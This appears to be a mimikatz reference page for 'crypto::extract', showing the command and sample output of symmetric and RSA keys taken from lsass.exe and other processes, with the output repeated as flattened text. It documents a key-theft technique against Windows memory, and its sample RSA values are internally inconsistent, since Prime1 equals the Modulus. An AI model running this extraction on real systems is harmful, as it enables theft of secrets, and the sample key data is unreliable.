extract

crypto::extract extracts keys from the CAPI RSA/AES provider (Experimental ).

mimikatz # crypto::extract

lsass.exe (816)

AlgId     : 3DES (0x10005)
Mode      : ChainingModeCBC (0x1)
IV        : 8a8c03aa5722b0ea
Key ( 24) : 1a4202f442ebde5aa20d72ea32ed1c30a83ee5ce2048a50a

AlgId     : AES (0x10002)
Mode      : ChainingModeCFB (0x3)
Key ( 16) : 213d8d48ff884017252091c4c3361b38

AlgId     : RC4 (0x10001)
Mode      : ChainingModeN/A (0x0)
Key ( 16) : ee9eb08d70250d26e6f6c4cb8d92df5d

AlgId     : RC4 (0x10001)
Mode      : ChainingModeN/A (0x0)
Key ( 16) : de3f10f59ca7c63edb40e06dd152a7e0

AlgId     : RSA (0x30001)
PubExp    : 4d11aa323757497ef5de5d526b8ba2502e6053aa9a6d55d2c2d2edcb310e6007550bf09c0fa5cf15da082fadf07398fab29fd803ad048235d95e2ee88e3c3ff39e083eaee1ac0d079b2b6664731742dfbb2fea5f39bfc6f59c0e3e724a27759a2c79d7c4c703c99256e1a664f278acb27cf015711ad9791424aee001f869d5f10c8b951aa5d561aa0dea8ce71d486d19ad632dac057143a25b1090d69d38fa03b2c794398cde74e4b57f3eee63573bcf144b392c86d57b66892afbce9ab5106bee7c03a5bb5cb4534f40c0e723a0905b4b9b38ee9504e7bb9357d880993e3bc2f353f2b92bd13b709758a9ac44fba685eb03a5b1c02db25893419888b0d27610
Modulus   : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5
Prime1    : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5
Prime2    : 8b50756840dc6f1e3e3ac17b0a977d7ffe7dcef561d8a8f9e73e5530c213722cbb7725bab3334cc18b432954d3f6a425b82d0188fdc39825b1fc2743b2ade05e60e949dbd06d66a8823192d80afd6d92736b2bbd3a07654a680ba90084a5066ff180c3a1fe28d5ba8617fb6fadb383763f5261abfe4e0a45f0c8490f55bd09c5

AlgId     : RSA (0x30001)

AlgId     : AES (0x10002)
Mode      : ChainingModeCBC (0x1)
Key ( 32) : 6d9fc1ae597be017a7e44c9b41dae46f5b690d01f7642043e0a0180197e1e2bb

AlgId     : AES (0x10002)
Mode      : ChainingModeCBC (0x1)
Key ( 16) : 932b41c722cdc1e2b9291b2789ca664b

svchost.exe (2328)

svchost.exe (5244)

AlgId     : ECDSA_P256 (0x30004)

AlgId     : ECDSA_P256 (0x30004)

chrome.exe (8300)

Algid     : CALG_RSA_KEYX (0xa400)
Key (284) : 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

powershell.exe (7084)

Previouscng Nexthash

Last updated 3 years ago

mimikatz # crypto::extract lsass.exe (816) AlgId : 3DES (0x10005) Mode : ChainingModeCBC (0x1) IV : 8a8c03aa5722b0ea Key ( 24) : 1a4202f442ebde5aa20d72ea32ed1c30a83ee5ce2048a50a AlgId : AES (0x10002) Mode : ChainingModeCFB (0x3) Key ( 16) : 213d8d48ff884017252091c4c3361b38 AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : ee9eb08d70250d26e6f6c4cb8d92df5d AlgId : RC4 (0x10001) Mode : ChainingModeN/A (0x0) Key ( 16) : de3f10f59ca7c63edb40e06dd152a7e0 AlgId : RSA (0x30001) PubExp : 4d11aa323757497ef5de5d526b8ba2502e6053aa9a6d55d2c2d2edcb310e6007550bf09c0fa5cf15da082fadf07398fab29fd803ad048235d95e2ee88e3c3ff39e083eaee1ac0d079b2b6664731742dfbb2fea5f39bfc6f59c0e3e724a27759a2c79d7c4c703c99256e1a664f278acb27cf015711ad9791424aee001f869d5f10c8b951aa5d561aa0dea8ce71d486d19ad632dac057143a25b1090d69d38fa03b2c794398cde74e4b57f3eee63573bcf144b392c86d57b66892afbce9ab5106bee7c03a5bb5cb4534f40c0e723a0905b4b9b38ee9504e7bb9357d880993e3bc2f353f2b92bd13b709758a9ac44fba685eb03a5b1c02db25893419888b0d27610 Modulus : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime1 : d70e7b5f8512f1698cf946d06c88e79bb8dd040bb5fb50e1b3291142feedb4a03732d12bd2ed8b2dd81dc3a546b46c34e82b202a59c01c8dc9ac3b6b6dcf3fb0a15fae7b632d643daf74e491284757f43ad3ff59ef78ce1f1f9b50325841d9343664bf1b8b56358a5a998ace10dab26977cfdc3b3a5e24809e665bb6b1292ee5 Prime2 : 8b50756840dc6f1e3e3ac17b0a977d7ffe7dcef561d8a8f9e73e5530c213722cbb7725bab3334cc18b432954d3f6a425b82d0188fdc39825b1fc2743b2ade05e60e949dbd06d66a8823192d80afd6d92736b2bbd3a07654a680ba90084a5066ff180c3a1fe28d5ba8617fb6fadb383763f5261abfe4e0a45f0c8490f55bd09c5 AlgId : RSA (0x30001) AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 32) : 6d9fc1ae597be017a7e44c9b41dae46f5b690d01f7642043e0a0180197e1e2bb AlgId : AES (0x10002) Mode : ChainingModeCBC (0x1) Key ( 16) : 932b41c722cdc1e2b9291b2789ca664b svchost.exe (2328) svchost.exe (5244) AlgId : ECDSA_P256 (0x30004) AlgId : ECDSA_P256 (0x30004) chrome.exe (8300) Algid : CALG_RSA_KEYX (0xa400) Key (284) : 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe (7084)